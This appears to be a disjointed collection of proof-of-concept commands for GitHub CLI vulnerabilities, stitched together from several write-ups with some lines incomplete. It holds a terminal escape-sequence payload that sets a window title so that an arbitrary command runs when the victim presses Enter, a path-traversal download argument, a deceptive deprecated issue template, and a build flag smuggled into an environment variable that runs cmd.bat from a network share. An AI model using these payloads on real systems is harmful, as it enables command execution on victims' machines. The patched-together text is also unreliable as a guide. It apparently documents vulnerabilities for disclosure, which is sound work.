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# rm -rf /tmp/d; gh release download -R v1.0.0 -D /tmp/d; ls -la /tmp/d
ls: cannot access '/tmp/d': No such file or directory
# cat /tmp/any-filename
./ --private-key ./privkey.pem --certificate fullchain.pem --data-to-serve <(echo arbitrary-content) --destination-filename ../any-filename
? Choose a template [Use arrows to move, type to filter]
DEPRECATED old issue template use a new one instead
> Open a blank issue
gh repo clone irsl/legacy-template-poc
cd legacy-template-poc
gh issue create -t title
gh repo create legacy-template-poc --description "github issue template legacy poc"
gh repo clone legacy-template-poc
mkdir -p .github/ISSUE_TEMPLATE
cat >.github/ISSUE_TEMPLATE/ <<'EOF'
name: DEPRECATED old issue template use a new one instead
about: Describe this issue template's purpose here.
title: default title
labels: ''
assignees: ''
echo -e '\x1Bk;echo this is an arbitrary command; .\x1B\ \e[21t\x1Bk. .\x1B\ \e[21t\e[21t\e[21t\e[21t\e[21t\e[21t\e[21t\e[21t\e[21t\e[21t\e[21t\x1Bk. View this repository on GitHub:\x1B\ \e[21t' > readme
Code 479 BytesWrap lines Copy Download
\x1Bk; <- start setting the window title
;echo this is an arbitrary command; <- the title itself - this is what we want to be executed after the victim presses the enter button
. <- just a placeholder as otherwise the whitespaces would
printf 'hello\n\x1B#8\nworld\n' > readme
cd script
go build build.go
cd ..
echo proof > c:\projects\proof.txt
set GH_OAUTH_CLIENT_ID=foobar -buildmode=c-archive -extar \\\someshare\cmd.bat